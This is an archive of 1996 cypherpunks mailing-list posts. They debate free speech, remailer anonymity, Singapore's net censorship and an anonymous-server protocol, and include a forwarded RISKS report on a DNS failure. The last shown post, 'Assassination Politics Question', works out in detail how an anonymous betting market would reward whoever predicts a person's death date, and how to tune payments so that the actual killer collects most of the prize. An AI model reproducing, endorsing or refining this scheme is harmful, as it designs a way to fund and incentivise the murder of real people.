the above, and I'll even throw in a 340MB IDE HD with Linux+remailers preinstalled! (Yes, I'm serious.) From paul at fatmans.demon.co.uk Mon Sep 2 20:11:38 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Tue, 3 Sep 1996 11:11:38 +0800 Subject: Free Speech and List Topics Message-ID: <841692279.5129.0@fatmans.demon.co.uk> > More disturbing to me recently has been the steady increase in subscribers > to this list who don't seem to value free speech very highly, who write of > their own nation's censorship as valiant efforts to protect citizen-units > from foreign devils, and, even more shockingly, from supposed defenders of > electronic freedom who are now talking about the need for limits on > anonymity. I too have noticed this, but we must remember that although we are the people who see the tyranny of censorship etc. all to clearly we are in a very small minority, the majority of people do not support censorship because they have made a reasoned judgement, the either support it because they are too lazy to do anytthing, too shit scared of the government if they do, or they just do not take the time to understand the issues and so support the common view, there is also the case that many people "go with the majority", because they do not want to appear different, and the media has so demonized free speech and liberty advocated that to associate yourself with them now is equivalent to telling people you are a rampant sexually deprived paedophile in an anorak. Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From mech at eff.org Mon Sep 2 20:28:35 1996 From: mech at eff.org (Stanton McCandlish) Date: Tue, 3 Sep 1996 11:28:35 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi In-Reply-To: <19960901220323595.AAA208@Esther.edventure.com> Message-ID: <199609022106.OAA15793@eff.org> > Therefore I would > favor allowing anonymity -- with some form of traceability only under terms > considerably stronger than what are generally required for a wiretap. [...] > Please note that this is not the same as the right to *private* > conversations and the use of encryption; this is the issue of being > accountable for what you publish in public. A problem here is that the *same* services and capabilities that permit anonymous speech in private permit anonymous speech in public. Compromising the latter compromises the former as well. > Anyone who seriously needs anonymity because of a repressive government is > likely to use a foreign (outside whatever jurisdiction he fears) server, so > that this is not a matter of "local" laws. The tracer would have to pass > through what I hope would be tighter hoops than we have now. Unless chaining of remailers is made manadatory and automatic, this is unlikely to work. CoS had little difficulty getting anon.penet.fi's logs, and getting a preliminary ruling against online anonymity from the Finnish courts. You have to have an anonymizing system that crosses a dozen or so national boundaries to make such an attack infeasible for most large organizations. You'd need a system that crossed 50 or more widely disparate jurisdictions to make it infeasible to large intelligence or law enforcement agencies, and even then you'd have to NOT have broad international agreements, such as you'd called for or it would be trivial to force all the remailers in the chain to cough up personally identifiable information. > My assumption is that there will be a wide variety of Net communities with > different rules/regulations/attitudes towards anonymity that would apply ex This is already true. > some kind of international sanctions; I think that's appropriate. That's what bugs me - if there are some kind of sanctions coming from a governmental body (I may be misinterpreting you here), that's probably enough to kill private and well as public anonymity on the Net. Incidentally, if something does happen from a governmental direction to kill online anonymity, it will probably be readily broadenable to all other media. -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From hallam at ai.mit.edu Mon Sep 2 20:52:36 1996 From: hallam at ai.mit.edu (Hallam-Baker) Date: Tue, 3 Sep 1996 11:52:36 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: <50a42c$nph@life.ai.mit.edu> Message-ID: <322B5BFD.41C6@ai.mit.edu> Timothy C. May wrote: > The point is to make clear to them that the Usenet and similar Web sites > are global in nature, not subject to censorship without a very high local > cost. If discussions of Lee Kwan Yew's dynasty are considered illegal, then > Singaporans will have to choose not to carry the various newsgroups into > which *I* post such messages! If the govt. of Singapore wish to keep their people in ignorance of their corruption it is going to be harder than banning a few newsgroups. I would expect the opposition to be scanning USEnet and like fora for email addresses ending with .sg and spamming appropriately. The irony of censorship is that its rarely effective and almost always superfluous. The people of singapore are aware that their government is corrupt. They vote it back in because they expect the alternative to be at least as corrupt. Its much like the US where there is a choice between the rightwing authoritarian Republican Party and the authoritarian, rightwing Democrats. > (This was done by many of us during the Karla Homulka and Teale trial in > Canada a couple of years ago: Canada imposed press restrictions on > discussion of the trial and the grisly evidence...and then was chagrinned > to find that the global Net did not adhere to their notions of what should > and could be discussed. They even seized copies of "Wired" at the border, > very much akin to Singapore's stone age policies.) There is a big difference between the Canada situation and the Singapore situation. In Canada the restrictions are temporary and stem from making the right to a fair trial a higher priority than the right to free speech. It is a conflict of two competing individual liberties. No observer of the OJ Simpson trial could state that the media coverage did not affect the outcome. The arguments that Mill advances for freedom of speech in On Liberty do not apply in the context of a temporary judicial injunction, they are utilitarian (suprise) and applying his general principle of "interests" would favour the temporary restriction. The situation in Sigapore is simply a corrupt government trying to supress legitimate democratic discussion. The intention is not to protect an individuals right to a fair trial, the intention is to restrict argument permanently. It is important that in an international forum people don't start imagining that their local customs are universally accepted as superior. The difference between Canadian and US law is a minor one and relates to different interpretations of a common principle. There is a vast gulf between the Singapore position and that of either the US or Canada. This is not simply a difference of local interpretation. Phill From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 2 20:57:59 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Tue, 3 Sep 1996 11:57:59 +0800 Subject: Free Speech and List Topics Message-ID: <01I90JJH1NJ49JDDSI@mbcl.rutgers.edu> From: IN%"tcmay at got.net" 2-SEP-1996 05:36:20.36 >No self-respecting Cypherpunk thinks the Antitrust Act and related acts are >worthy of enforcement. >(Think of how the technology we support will tend to allow new avenues for >price collusion, interlocking directorates, new forms of business combines, >unreadable secure communications with foreign competitors, and so on, all >things the Antitrust regulators are already growing worried about.) There's a difference between thinking something shouldn't be enforced (e.g., drug laws for adults) and thinking that other things - such as privacy and free speech - are more important than fully effective enforcement of something (anti-terrorism measures, AntiTrust Act, etcetera). I don't think that transparent houses, as Perry put it, should be required to prevent murders - but I don't approve of murders either. It's a problem with means, not ends. -Allen From paul at fatmans.demon.co.uk Mon Sep 2 21:04:09 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Tue, 3 Sep 1996 12:04:09 +0800 Subject: Secure anonymouse server protocol: comments please Message-ID: <841692281.5135.0@fatmans.demon.co.uk> The following is a very sketchy plan for a secure protocol for an anonymous server which allows replies without storing a recipient database in the clear. To send a message: The sender first exchanges keys with the sever (public key cryptography assumed), the server now has the users key and the user the servers. The user sends the server: The recipient for the message the message itself a password previously agreed The users ID on the server The server decrypts to get the above back in plaintext, then it encrypts the ID & the users address with a random session key and stores it in the database. notice nothing is stored in the clear the server now encrypts the session key with the senders public key, and fowards it to the sender of the original message. now finally the server sends the message onto the intended recipient in plaintext (who must also have exchanged keys with the server) along with the ID of the sender encrypted with the servers public key. the recipient responds with his reply, and the ID of the sender still encrypted in the servers Public key The server stores this When the user (the original sender) wants to pick up his mail after a couple of days he sends the server his ID encrypted with the servers public key, the server compares this with all of the encrypted IDs in the database and when it finds a match it fowards the corresponding mail to the original sender of the first message. Thats all folks. This system has 1 huge fault, we can encrypt a uses ID with the servers public key to see what his ID in the encrypted database is and therefore identify him, maybe we need two seperate server public keys, and when IDs come in encrypted with key1 (the one it releases) it decrypts with secretkey1 then encrypts with publickey2 (the one it keeps secret) or maybe we can just hash and sign the IDs in the database? as I said it`s very sketchy, I made most of this up as I wrote it so if you must tear it to pieces please do so constructively, it could be the route to a secure system.... Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6 mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53 6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3 sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az4= =riHc -----END PGP PUBLIC KEY BLOCK----- From franf at hhs.net Mon Sep 2 21:11:03 1996 From: franf at hhs.net (Fran Frisina) Date: Tue, 3 Sep 1996 12:11:03 +0800 Subject: (no subject) Message-ID: <322BB272.442F@hhs.net> desubscribe From snow at smoke.suba.com Mon Sep 2 21:23:28 1996 From: snow at smoke.suba.com (snow) Date: Tue, 3 Sep 1996 12:23:28 +0800 Subject: Sen. Leahy's "impeccable cyberspace credentials" In-Reply-To: <19960830.170609.9758.0.patrickbc@juno.com> Message-ID: On Sat, 31 Aug 1996, patrick b cummings wrote: > jimbell, > I agree with what you are saying but not all polititions are that bad. > You make it sound as if their are no politisions are for freedom of the > net. Politicians get power by restricting, not by liberating. Politicians who liberate don't get re-elected. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From jimbell at pacifier.com Mon Sep 2 21:25:19 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 3 Sep 1996 12:25:19 +0800 Subject: FLT 800: From the Rumor Mill...But It Makes Sense.. (fwd) Message-ID: <199609030140.SAA24564@mail.pacifier.com> At 11:59 PM 9/1/96 -0700, James A. Donald wrote: >At 09:04 PM 9/1/96 -0400, Alan Horowitz wrote: >> The Aegis ship in the Gulf wzs not in an exercise. It was in a war zone. >> >> If my memory serves, the Iranian jetliner had its squawker turned off, or >> broken. > >Your memory does not serve: The computers record of the events was: > >Computer tells crew: Civilian jetliner on radar. > >Crew expecting an attack by jetfighters, tell computer to shoot it down. > >Computer does not put up a bunch of dialogs saying: "Hey, I think this >is a CIVILIAN airliner, did you get that CIVILIAN airliner, are you quite >sure you want it shot down? Instead it just shoots it down. Suggestion for future improvement... C:>DEL AIRLINER.COM Are you sure? (Y/N) _ Jim Bell jimbell at pacifier.com From alanh at infi.net Mon Sep 2 21:25:49 1996 From: alanh at infi.net (Alan Horowitz) Date: Tue, 3 Sep 1996 12:25:49 +0800 Subject: desubscribe In-Reply-To: Message-ID: desubscribe From chuck at nova-net.net Mon Sep 2 21:27:52 1996 From: chuck at nova-net.net (Chuck Thompson) Date: Tue, 3 Sep 1996 12:27:52 +0800 Subject: The Esther Dyson Flap Message-ID: <1.5.4.32.19960903005919.0068fc70@mail.nova-net.net> I don't quite understand the position taken by Mr. Assange and Mr. Unicorn regarding recent statements attributed to Ms. Dyson. I would appreciate some additional insight. It appears as though they are both critical of statements (taken out of context according to Dyson) because of her position with the EFF. It appears that they both believe that she has no right to her opinion if it is contradictory to the policy of the EFF. If such an EFF policy exists, and if Dyson is of a different opinion, the fact that she holds office in an organization with which she is not in total agreement should not count against her. In fact, it is to her credit that she has the courage to speak her mind, considering that hers is an elected position. She has something to lose by speaking her mind publicly. Mr. Unicorn remains anonymous, thereby mitigating repercussions which might otherwise accrue to him as a result of the expression of his opinion. I agree with Mr. Unicorn that the EFF should state its position unequivocally. I do not agree that officers or staff of EFF should not be allowed to disagree with that position, if in fact they do. In the case of Ms. Dyson, how can we know whether she agrees or disagrees with a non-existant policy? She has, evidently, spoken her mind. Isn't that what freedom of speech allows? Imagine, if you will, where we would be right now if all elected representatives were censured for disagreeing with stated government policy. That ability is what makes this country great - and, what you both seem to be saying you stand for. Is your position solid only if everyone agrees with you and you them? Whatever happened to "defending to the death your right to say it"? Pouncing on someone, without knowing all the facts, who is vulnerable because of their position smacks of dirty politics - it is distasteful. Why not ask for the facts from the source? Then state your opinions or make your threats about not contributing financially. In keeping with the message, you have the right to take a cheap shot. I'd just like some insight into your thinking. Regards, Chuck Thompson From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 2 21:31:14 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Tue, 3 Sep 1996 12:31:14 +0800 Subject: Any cypherpunk solutions to this problem? Message-ID: <01I90CQSB7289JDDSI@mbcl.rutgers.edu> To the degree that he's correct, how can such problems be solved while increasing privacy, security, etcetera? What sort of decentralized replacements for the current DNS system can be used, preferably with prevention of removal of DN for political reasons? -Allen From: IN%"rre at weber.ucsd.edu" 27-AUG-1996 06:03:35.07 [Maybe the next Internet myth to bust up is this stuff about the Internet being decentralized. "Designed to survive a nuclear attack", etc etc. I'm afraid it doesn't work like that. The net has little redundancy, the backbones are in the hands of a small number of large companies, and all of the detailed mechanics of getting your packets to their destination are fragile and prone to propagating errors. The high levels of service to which we've grown accustomed are due to the hard work of specific people, not to the intrinsic properties of the machinery. The net works because those people are able to do the right thing. The conditions that *let* them do the right thing may disappear next month, or the month after that. So let's forget the technological determinism and lose our complacency about the future, and instead have a little gratitude to the hackers who make it work and a little political concern for the architectural choices that are coming right up on the horizon.] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: Mon, 26 Aug 1996 14:15:06 -0700 (PDT) From: risks at csl.sri.com RISKS-LIST: Risks-Forum Digest Monday 26 August 1996 Volume 18 : Issue 38 ---------------------------------------------------------------------- Date: Sat, 24 Aug 1996 08:53:31 -0700 From: stevenw at best.com (Steven Weller) Subject: DNS failure [from Matthew Dillon] The following describes DNS meltdown at my ISP the other day: all DNS services were unavailable, despite multiple servers being online. Lack of DNS assured that other working services were unavailable to everyone who didn't have IP addresses written down. Here is a technical explanation of the DNS failure, for those of you interested. First, a synopsis of how DNS works... every site on the net serves their own DNS records. Some sites serve other people's DNS records. For example, BEST serves the DNS records for best.com, best.net, and most of our customer's custom domains. No site serves more then a small fraction of the DNS records on the internet from their own database. The way DNS works is that when a domain name needs to be resolved, our DNS server (anyone's DNS server) first goes to the NIC to ask where to go to resolve the domain name. The NIC itself cannot resolve domains, it can only tell our DNS server where to go to resolve a domain. Our DNS server then goes to the specified remote site to resolve the domain name belonging to that site. The remote site replies with the answer which our DNS server (a) caches for future reference, and (b) returns to the original requester. The caching is important, because otherwise a DNS server would have to re-query the remote DNS server every time someone wanted to resolve a domain. DNS records propagate through caches. It is simply not possible to run a DNS system with caching turned off, it would create an impossible load on the internet. Around 4:00 a.m. yesterday, some unknown site's cache got corrupted. The corruption propagated to many (hundreds) of other sites on the internet and eventually propagated to us. This corruption hit a bug in the DNS server program that wound up corrupting the program, causing DNS to loose major records. Restarting the server in this case does not solve the problem because, due to the caching on remote sites, the corrupted record repropagates almost instantly. BEST was hit by this problem very hard due to the large number of custom domains we serve... so many DNS requests come into BEST and are made by BEST that our servers would hit the corruption out on the internet within 10 seconds of starting up. Worse, this particular corruption tended to destroy the root records (stored in memory), called SOA records, for the domains served locally. This destroyed the mail system causing mail messages to bounce rather then to simply be delayed, because the DNS server was saying 'site X does not exist' rather then timing out. It's worst possible corruption that can occur in a DNS system. -- It turns out that the last two BIND releases contain a bug that, when a corrupted record of the type that started propagating at 4:00 a.m. is received, results in the destruction of other **unassociated** records stored in memory. The particular release of BIND that we were using had been running perfectly for several *months* before this incident. It was not something recently installed. There are two fixes to the problem: (1) One can lock out those sites where the corrupted records come from, and (2) One can revert to an older release. (1) is not a good solution because, due to the nature of DNS, corruption can propagate to many sites and it would be impossible to keep up to date and lock all of them out. We wound up taking action #(2) and reverting to an older release of bind which, fortunately, did not have the bug that caused the problem. We had to revert to BIND 4.9.3. Unfortunately, we did not think to do this for many hours because we were all convinced that the problem was external in nature and just didn't think to try a reversion. In hind sight, that is the first thing we should have tried since we had the friggin binary for the older version sitting in our source tree. As far as DNS goes... the DNS we run is not 'bsd' or 'sgi' .. it's the *official* world-wide BIND distribution run by Paul Vixie. It is really not appropriate to run the older versions shipped with most operating systems due to massive, massive security holes. The corruption problem was unavoidable. What *was* avoidable was the long period of time that elapsed before the problem got fixed, which I take full responsibility for. We spent most of that time trying to track down where the corruption was coming from... a near impossible task. Around 6:00 p.m. scuttlebutt started propagating regarding a possible bug in the last two BIND releases at which point we instantly reverted to an earlier version, which fixed the problem, then started banging our heads against the wall for not trying it earlier. Matthew Dillon Engineering, BEST Internet Communications, Inc. ------------------------------ Date: 15 Aug 1996 (LAST-MODIFIED) From: RISKS-request at csl.sri.com Subject: Abridged info on RISKS (comp.risks) The RISKS Forum is a MODERATED digest. Its Usenet equivalent is comp.risks. => SUBSCRIPTIONS: PLEASE read RISKS as a newsgroup (comp.risks or equivalent) if possible and convenient for you. Or use Bitnet LISTSERV. Alternatively, (via majordomo) DIRECT REQUESTS to with one-line, SUBSCRIBE (or UNSUBSCRIBE) [with net address if different from FROM:] or INFO [for unabridged version of RISKS information] => The INFO file (submissions, default disclaimers, archive sites, .mil/.uk subscribers, copyright policy, PRIVACY digests, etc.) is also obtainable from http://www.CSL.sri.com/risksinfo.html ftp://www.CSL.sri.com/pub/risks.info The full info file will appear now and then in future issues. *** All contributors are assumed to have read the full info file for guidelines. *** => SUBMISSIONS: to risks at CSL.sri.com with meaningful SUBJECT: line. => ARCHIVES are available: ftp://ftp.sri.com/risks or ftp ftp.sri.comlogin anonymous[YourNetAddress]cd risks or http://catless.ncl.ac.uk/Risks/VL.IS.html [i.e., VoLume, ISsue]. The ftp.sri.com site risks directory also contains the most recent PostScript copy of PGN's comprehensive historical summary of one liners: get illustrative.PS ------------------------------ End of RISKS-FORUM Digest 18.38 ************************ From snow at smoke.suba.com Mon Sep 2 21:31:17 1996 From: snow at smoke.suba.com (snow) Date: Tue, 3 Sep 1996 12:31:17 +0800 Subject: mailing lists In-Reply-To: <19960830.205359.4758.1.patrickbc@juno.com> Message-ID: On Sat, 31 Aug 1996, patrick b cummings wrote: > If any body knows any good mailings lists please tell me. > > -P. Cummings- > Patrickbc at juno.com clueless at c2.org is pretty good. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From gimonca at skypoint.com Mon Sep 2 21:35:52 1996 From: gimonca at skypoint.com (Charles Gimon) Date: Tue, 3 Sep 1996 12:35:52 +0800 Subject: Cocktail Party Conversation... Message-ID: ...of the clueful who should know better... "Ms. Denning, I'd like to introduce Ms. Dyson. Ms. Dyson, Ms. Denning." *********************************************************************** Wild new Ubik salad dressing, not | gimonca at skypoint.com Italian, not French, but an entirely | Minneapolis MN USA new and different taste treat that's | http://www.skypoint.com/~gimonca waking up the world! | A lean, mean meme machine. *********************************************************************** From tcmay at got.net Mon Sep 2 21:36:31 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 3 Sep 1996 12:36:31 +0800 Subject: The Earliest CP Remailer *DID* Emphasize Anonymity Message-ID: At 12:27 AM 9/3/96, Bill Stewart wrote: >At 11:05 AM 9/2/96 -0700, Tim wrote: >>No, the focus was at _least_ as much on providing anonymity as on >>protection from eavesdroppers or traffic analysts. More so, actually. >>How do I know this? Well, I was the one who did the presentation on >>Chaumian mixes at the first meeting, describing them as remailers and using >>paper envelopes-within-envelopes to illustrate the concept. >>Later that day, in the "Crypto Anarchy Game" we played to educate the > >Thanks for the history correction; I got involved with Cypherpunks about >a year after the initial meeting/game, so I'm going on other people's >comments about the intent of mixes and remailers. Out of curiousity, >did either spam or blackmail show up during the first run of the game? A full range of interesting behaviors showed up. Usually this was publicized via the "out-of-band" channel of someone yelling "Hey, I was just told to deposit $100 credits to the account of "AnonymousBanker" or else my digital pseudonym will be published." A murder-for-hire business was started, several weapons-trading schemes developed, etc. Information selling was a big market success. (Not very surprising, given that Eric and I devised the playing cards, roles to be played (banker, assassin, money launderer, freedom fighter, whistleblower, etc.), and doled out crypto-currency (Monopoly money). The idea was not to discover real-world lessons, of course, but to graphically demonstrate some of the technology, some of the ways crypto-anonymity would change interactions, etc.) >>And all of the early uses were explicitly to anonymize the sender, not to >>deter eavesdropping (which conventional crypto works well for, anyway). > >Keeping the sender's identity hidden from the recipient is a different >problem than keeping either of them hidden from Untrusted Third Parties. >Conventional crypto is fine for keeping message content secure from >eavedroppers, but isn't enough to prevent traffic analysis; >that requires either mixes or at least message pools or broadcasts. Yes, but my point was more that we were more concerned about building a solid foundation which would solve a larger class of problems than just straight encryption would. Remailers do this. Anonymity of sender was a dominant mode in the game, for various reasons. But anonymity of receiver was also possible (we faked message pools by pinning messages to a board and then letting them be taken down, but not letting others spend time seeing which were taken down...obviously a determined person could have seen which were removed, and by whom...). Regarding traffic analysis, at least one person (George ?) set himself up as an NSA traffic analyst and tried to deduce pseudonym/true name mappings. (We gave some people roles as "NSA," "narc," and whatnot.) I no longer recall all the details of how the game evolved, interesting behaviors seen, etc. I think someone posted a summary of his reactions to the game a few weeks afterward, circa September/October 1992. It should be in any archives that cover this period. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From enzo at ima.com Mon Sep 2 21:39:09 1996 From: enzo at ima.com (Enzo Michelangeli) Date: Tue, 3 Sep 1996 12:39:09 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: <2.2.32.19960902124403.00ae6430@panix.com> Message-ID: I agree with what you say, and that's exactly why all this thread is out of focus. Blocking anything on the net is impossible, we know it and, I'm sure, the Singapore government knows it as well. The filtering proxies they deployed, however, allow them to show that they are "doing something" and get continued support from the socially conservative constituency; the net will route around, and life will go on. If the purpose of those measures had been political censorship, the SG government would have banned crypto or simply restricted Internet access, as they have done with mass media like satellite TV. Hovever, they on one hand know that Internet is strategic to the country's future development, and on the other hand that its use is limited to a well-educated elite not likely to fall prey of simplistic propaganda as tabloid readers would be, and that would be able to find sources of free information anyway: hence, the green light. Let's not fool ourselves: social mores are determined by economic development, which in turn is driven by technology and free markets. Political activism may sometimes help, but it's largely overrated (and in some cases it may backfire). When a government pursues free market and technological advancement, time is on freedom's side. Enzo On Mon, 2 Sep 1996, Duncan Frissell wrote: > At 07:06 AM 9/2/96 +0800, James Seng wrote: > >that). I have a long argument with this person, telling him that despite > >what they have done, i could still access to those stuff which they ban. > >his reasoning is "how many people can do it? 10%? 5%? That's fine with us. > >If the people really wans it, they can get it". > > The flaw with this view is that it is no harder to deploy software that > defeats Singapore's proxy than it is to establish a tcp/ip connection in the > first place. For civilians (such as myself) establishing a tcp/ip > connection is as hard or as easy as establishing an encrypted tcp/ip tunnel > to defeat government control efforts. For both these tasks, I am dependent > on software writers who know more than I do. Since the software of the Net > is written by people not governments, the governments will find it hard to > hold "free users" down to a 5% or 10% figure. The Net is nothing more than > the software that it runs on and we (not governments) write the software. > > In addition, we are not imposing our ideology on Singapore. If Singapore > changes, it will be because an encounter with the realities of the free flow > of information changes it. > > DCF > From snow at smoke.suba.com Mon Sep 2 21:41:08 1996 From: snow at smoke.suba.com (snow) Date: Tue, 3 Sep 1996 12:41:08 +0800 Subject: "Security risks" vs. "credit risks" In-Reply-To: <199609010153.UAA22411@manifold.algebra.com> Message-ID: On Sat, 31 Aug 1996, Igor Chudov @ home wrote: > Timothy C. May wrote: > > than in Marianne Smith, retired school teacher from Peoria. > > Remember, private airlines are just that: private. Surely we do not support > > laws which limit a private airline from using data it has acquired to > > decide whom to pay closer attention to. This is the essence of what > > knowledge is. > Unfortunately, most private businesses suck up to the government. It > is understandable if we note that they can be harassed by the government. > Airlines, for example, are under tight and rather arbitrary control of > the FAA. Nail, Hammer, Head. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From um at c2.net Mon Sep 2 21:43:34 1996 From: um at c2.net (Ulf Moeller) Date: Tue, 3 Sep 1996 12:43:34 +0800 Subject: FWD: Another try to kill democracy In-Reply-To: <322B5766.60F8C2BB@dds.nl> Message-ID: >I just got wind that the German government is planning to force german >ISP's >to shut off access to my ISP, XS4ALL, because the german magazine >'Radikal' >has a web page on xs4all. That would be which government agency? >http://www.xs4all.nl/~tank/radikal/index.htm From stewarts at ix.netcom.com Mon Sep 2 22:04:16 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 3 Sep 1996 13:04:16 +0800 Subject: The Earliest CP Remailer *DID* Emphasize Anonymity Message-ID: <199609030030.RAA04862@toad.com> At 11:05 AM 9/2/96 -0700, Tim wrote: >No, the focus was at _least_ as much on providing anonymity as on >protection from eavesdroppers or traffic analysts. More so, actually. >How do I know this? Well, I was the one who did the presentation on >Chaumian mixes at the first meeting, describing them as remailers and using >paper envelopes-within-envelopes to illustrate the concept. >Later that day, in the "Crypto Anarchy Game" we played to educate the Thanks for the history correction; I got involved with Cypherpunks about a year after the initial meeting/game, so I'm going on other people's comments about the intent of mixes and remailers. Out of curiousity, did either spam or blackmail show up during the first run of the game? >And all of the early uses were explicitly to anonymize the sender, not to >deter eavesdropping (which conventional crypto works well for, anyway). Keeping the sender's identity hidden from the recipient is a different problem than keeping either of them hidden from Untrusted Third Parties. Conventional crypto is fine for keeping message content secure from eavedroppers, but isn't enough to prevent traffic analysis; that requires either mixes or at least message pools or broadcasts. > Kleinpaste .... Julf .... I've also been pleased by how long Julf's remailer stayed in business. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From jimbell at pacifier.com Mon Sep 2 22:06:28 1996 From: jimbell at pacifier.com (jim bell) Date: Tue, 3 Sep 1996 13:06:28 +0800 Subject: Assassination Politics Question Message-ID: <199609030140.SAA24561@mail.pacifier.com> At 06:10 PM 9/2/96 -0500, correspondent wrote: >If there are more than one accurate prediction for an even, how will >CP Server will allocate the prizes? What made me think of that is >that, only in the case of famous peoples, a very smart individual >might make a prediction simply out of being smart and informed. To a first approximation, they could split the reward among the correct guessers. This is an issue that I considered in some detail a year ago, but which (surprisingly enough) hasn't been raised by others. As I pointed out in AP part 1, it is necessary to reduce "shotgun guesses" among people who simply guess a date (or many dates) and make a bet. That's why I included the system of requiring the predictor to include a payment with the prediction, in such a way that the prediction remains anonymous while the included money is always paid to the AP organization. This might initially appear to be a burden to the potential "guesser"/killer, but in fact if he understands the reason for it he'll want the system in place: It's one of the main ways to avoid the situation where multiple people make guesses for a particular person and date, and thus it would tend to ensure that the successful "guessor" is the only one to make that guess. Some of my analysis in AP part 1 was superficial and not really accurate, because in the example it gave, it suggested that the amount of money that would have to be included might be as little as 1/1000th of the reward money. However, chances are it'll usually be somewhat higher for this reason: Let's say a person does something REALLY AWFUL, such as Jeffrey Dahmer or another multiple murderer. Suddenly, he goes from completely anonymous to Public Enemy #1. One would suppose that if AP was operating "efficiently," he'd be dead in a week. However, if indeed he's dead in a week, and you only have to pay 1/1000th per day to place your bet on his demise, you could (hypothetically) make your bet for all seven days, paying a total of 7/1000th of the prize, and assuming the death occurred any day that week you'd be guaranteed to share in that prize. But that's the problem: You'd only _share_ in that prize, because many other people would get the same idea and they'd make similar bets, and the thing would simply turn into a Lotto-type game. The potential killer out there, aware of this problem, would hesitate to make his bet under those circumstances, because it is almost certain he'd lose at least part of the prize to others. The result would be a great deal of suspense, because nobody would know when somebody is actually going to place a prediction and carry out a killing. The AP organization would rake in the money from all those bets, but the killing would be delayed and the betting public would become unhappy. At some point the "prediction" donations would slow down, and perhaps a killer would take this as a cue to actually make his prediction. One way to avoid this is to carefully adjust the amount of payment that's required with the "prediction," raising it _just_enough_ to deter all but "informed guessing" among people who know what's going to happen. Or, at least, to reduce "uninformed guessing" to a level which doesn't dramatically affect the fulfillment of the donations. The problem with this is that this price-setting would be a lot of work, and is not likely to produce the "right" price. It would be somewhat akin to the kind of central planning that the communists never did very well. The problem with trying to set a price like this is that to do it right, requires WAY too much knowledge, knowledge that will often only be known by a small number of people that you can't identify. Perhaps the most obvious solution is to allow the free market to decide how much a given prediction is worth. In other words, the Invisible Hand of Adam Smith. Instead of asking for some specific amount of money along with any given prediction, simply announce that along with a prediction the predictor ought to include some portion of digital cash, although there would be no minimum amount required. Assuming the associated prediction turns out to be true, the reward fund will be distributed on a pro-rated basis, divided up based on the amount of prediction. For example, if you're the killer and you include a dollar with your prediction, and I'm a random, guessing predictor and I include a dime, you get 1/1.1 of the reward and I get 0.1/1.1. Had you included $10 with your prediction, you'd have won 10.00/10.10, and I'd get 0.1/10.10. Sure, the amount a predictor included might be as little as a dime, and if that's the only correct prediction he'll get the entire amount of the reward. But a killer would be stupid to ONLY include a dime, because somebody else could, likewise, include a dime per day for a prediction for a given person, and then he'd get half of the reward if nobody else did the same thing. And since it would only cost him $0.10 per day or $36.50 per year for a given person, he'd be dollars ahead to do this. It should be clear that a person who really KNEW that the target would die on a particular day would want to include enough digital cash to help ensure that he's the beneficiary of a good fraction of the reward, ideally most or all of it. On the other hand, he won't want to include so much that it's "too much" a proportion of the reward itself, since the payment is non-refundable and it reduces his net reward. The random guesser likewise wants to maximize his share, but unlike the killer does not have the specific knowledge that the death will occur on that particular day. With this system, the market is responsible for finding its own equilibrium point. The AP organization need not decide how likely a given death is, and how much money to ask for. Its job is made substantially simpler. Jim Bell jimbell at pacifier.com From stewarts at ix.netcom.com Mon Sep 2 22:11:22 1996 From: stewarts at ix.netcom.com (Bill 